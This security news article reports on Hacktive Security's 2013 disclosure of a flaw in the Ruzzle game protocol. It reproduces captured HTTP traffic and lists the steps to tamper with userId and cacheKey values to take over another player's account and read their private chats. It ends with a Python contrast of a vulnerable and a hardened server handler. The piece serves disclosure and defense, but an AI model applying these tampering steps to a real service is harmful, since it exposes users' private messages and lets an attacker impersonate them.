Hacktive Security discovers flaw in Ruzzle protocol that threatens users' privacy

Pierluigi Paganini April 02, 2013

Researchers at Hacktive Security, an independent security consulting company, have demonstrated how insidious even a simple, harmless-looking, large-scale application can be.

We live in the digital era: everything is connected to large networks, and applications run on increasingly complex devices that interact deeply with their owners. In this scenario security requirements assume crucial importance, and the security of the overall architecture also depends on the security of its single components.

In recent months mobile users have gone crazy for a simple word game, inspired by the board games Boggle and Scrabble, named Ruzzle, developed by the Swedish gaming company MAG Interactive and available for iOS and Android devices.

In early 2013 the researchers at Hacktive Security started a study of the most popular mobile applications, including Ruzzle, focusing on the protocol implemented and the possible repercussions for users' privacy.

The Ruzzle protocol uses JSON for the responses within a user's session; the security analysts discovered that it is possible to tamper with it because the server performs no validation of the data sent by the application. A lack of server-side data validation is widely exploited in web applications, typically to increase the attacker's privileges or, worse, to impersonate the victim within an authenticated session.

The research demonstrated that it is possible to obtain access to a profile other than one's own without authentication, performing actions exactly as the attacked user would.

One of the most interesting components of Ruzzle is the chat: today the key feature of any game is its social aspect, its ability to put users in direct contact while they simply play a game or exchange messages. Ruzzle is no exception to this rule, and the experts at Hacktive Security demonstrated that an ill-intentioned user can obtain full control of the victim's account, with serious repercussions.


The attacker can access the whole list of played games, including current games, and could also challenge the victim's friends, but the most concerning aspect is that the attacker could access the victim's private messages exchanged with other users via the internal chat feature and could impersonate the victim in other chat conversations.

The following is the evidence provided by the team of analysts in their blog post:

Opening Ruzzle on a mobile device, the app performs the login process through a request using a classic HTTP POST method:

POST /api/user/login HTTP/1.1
Host: davincigameserver.appspot.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
Content-Length: 222
Accept-Language: en-us
Accept: */*
Connection: keep-alive
User-Agent: Ruzzle/1.4.7 CFNetwork/609.1.4 Darwin/13.0.0

{"user":{"userId":-1,"password":"51452b9113ac704754f6878544d938c8b2f4edd3","useFacebookImage":"false","avatarId":0,"deviceId":"18:9E:BF:41:DD:65","username":"******"},"locale":"en_US","version":"1.4.7","premium":"false"}

The POST above is the request originated by the client, containing the right parameters submitted through the application (in our case the login process is performed through the integration with Facebook authentication)."

As shown above, all the information related to a user's identity is included in the JSON structure sent as a response; this data can be easily intercepted and manipulated, for example by modifying the value of the userId parameter used to identify the victim.

HTTP/1.1 200 OK
Content-Type: application/json
Date: Wed, 02 Jan 2013 08:37:33 GMT
Server: Google Frontend
Cache-Control: private
Content-Length: 257

{"applications":["1","4"],"avatarId":"0","facebookId":"*********","locale":"en_US","matchesPlayed":"0","premium":"false","ranking":"0","session":"628CC4D9743CE8557FDD3D2D175AFFD5920642B3","useFacebookImage":"true","userId":"*********","username":"*****"}

"To obtain the value of a userId it is enough to intercept the regular traffic generated by Ruzzle while challenging the chosen victim. We proceeded to tamper with the value of the userId parameter, replacing it with the one assigned to our victim:"

{"applications":["1","4"],"avatarId":"0","facebookId":"*********","locale":"en_US","matchesPlayed":"0","premium":"false","ranking":"0","session":"628CC4D9743CE8557FDD3D2D175AFFD5920642B3","useFacebookImage":"true","userId":"tamperedId","username":"*****"}

Once this is done, the last step is to tamper with a few other parameters inside the refreshCache POST. The parameters that need to be tampered with are the following cacheKey values:

  • listRequests_NNNNNNNNN
  • listInvites_NNNNNNNNN
  • listActiveGames_NNNNNNNNN
  • list_FinishedGames_NNNNNNNNN

The NNNNNNNNN represents the userId; in the POST originated by Ruzzle it contains the legitimate value of the userId cached by the app. Submitting these cacheKey values with the numeric part after the underscore replaced by the victim's userId is the final step. The JSON response to this POST indeed loads into the Ruzzle app all the data about the victim's account, as briefly reported below.

HTTP/1.1 200 OK
Content-Type: application/json
Date: Wed, 13 Mar 2013 11:39:05 GMT
Server: Google Frontend
Cache-Control: private
Content-Length: 44369

[…]

{"gameId":"3553712971150881448","persistedRound":"false","player1Done":"false","player1Score":"0","player2Done":"false","player2Score":"0","round":"1","seed1":"1525374704","seed2":"816673570","seed3":"494846459"},{"gameId":"3553712971150881448","persistedRound":"false","player1Done":"false","player1Score":"0","player2Done":"false","player2Score":"0","round":"2","seed1":"1159880445","seed2":"281586875","seed3":"645812112"}],"state":"1","type":"0"},{"userId":"0","cacheKey":"readGame_3100519240091618999","cacheTimestamp":"1363174744785","chatConversation":{"userId":"0","conversationId":"1032368976","lastUpdated":"1363164721741","messages":[{"message":"This is a private conversation","read":"true","sender":"*********","timeSent":"1363162097326"},{"message":"Are you sure? ","read":"true","sender":"*********","timeSent":"1363162140730"}]

[…]

At this point the attack is complete: the Ruzzle client on the mobile device has access to the victim's account, including all the information described above.
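The root cause described in the evidence above is that the server trusts a client-supplied userId, both in the login response and in the numeric suffix of each refreshCache cacheKey. The following is an added illustration, not code from Ruzzle or from Hacktive Security: a toy refreshCache handler in its vulnerable form beside a hardened one that derives the user from the server-side session and rejects any cacheKey naming someone else. The request body shape, the session store and the account data are constructed assumptions.

```python
import json
import re

# Constructed sample state: which user a session token belongs to, and the
# per-user data a refreshCache call would return (assumed shapes, not Ruzzle's).
SESSIONS = {"628CC4D9743CE8557FDD3D2D175AFFD5920642B3": "111111111"}
ACCOUNT_DATA = {
    "111111111": {"listActiveGames": ["game-A"], "listInvites": []},
    "222222222": {"listActiveGames": ["game-B"], "listInvites": ["from-C"]},
}

# The four cacheKey prefixes named in the write-up, followed by "_" and a userId.
CACHE_KEY_RE = re.compile(
    r"^(listRequests|listInvites|listActiveGames|list_FinishedGames)_(\d+)$")


def vulnerable_refresh_cache(body: str) -> dict:
    """Mirror of the flaw: serve whatever userId the client wrote into each cacheKey."""
    out = {}
    for key in json.loads(body)["cacheKeys"]:
        m = CACHE_KEY_RE.match(key)
        if m:
            prefix, uid = m.groups()
            out[key] = ACCOUNT_DATA.get(uid, {}).get(prefix, [])
    return out


def hardened_refresh_cache(body: str, session_token: str) -> tuple:
    """Bind the lookup to the session's user; refuse keys that name anyone else."""
    uid = SESSIONS.get(session_token)
    if uid is None:
        return 401, {}                      # no valid server-side session
    out = {}
    for key in json.loads(body)["cacheKeys"]:
        m = CACHE_KEY_RE.match(key)
        if m is None or m.group(2) != uid:
            return 403, {}                  # malformed or tampered cacheKey suffix
        out[key] = ACCOUNT_DATA[uid].get(m.group(1), [])
    return 200, out


# Constructed request bodies: one honest, one with the suffix swapped to another user.
HONEST_BODY = json.dumps({"cacheKeys": ["listActiveGames_111111111"]})
TAMPERED_BODY = json.dumps(
    {"cacheKeys": ["listActiveGames_222222222", "listInvites_222222222"]})
```

The vulnerable handler hands out the other account's data for the tampered body, while the hardened one answers 403 because the suffix does not match the session owner.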

What is the lesson that the Hacktive Security team has given us?

There are several points for discussion arising from the Italian team's study. The first consideration concerns the level of exposure users face through their ordinary access to the internet: even a simple application could be exploited by attackers to violate our privacy. Be aware of which applications you use, and in which context; BYOD is a hotly debated topic today, and the improper use of applications in the workplace could expose sensitive company information, with serious consequences.

The second consideration concerns the design of mobile applications and the need to put users' security first, even when developing a video game. Mobile devices are powerful platforms and attackers could exploit them for various purposes; video games are a principal vector of infection and could easily be used to gain access to users' devices.

The app world is growing at an impressive rate, pushed by the explosion of the mobile market, but we cannot forget that apps also run in other contexts, such as appliances. For this reason I believe that software producers have to recognize and share a set of minimum security requirements … I hope that in the future it will not be so simple to access the data managed by an application like Ruzzle.

Pierluigi Paganini

(Security Affairs – Security)
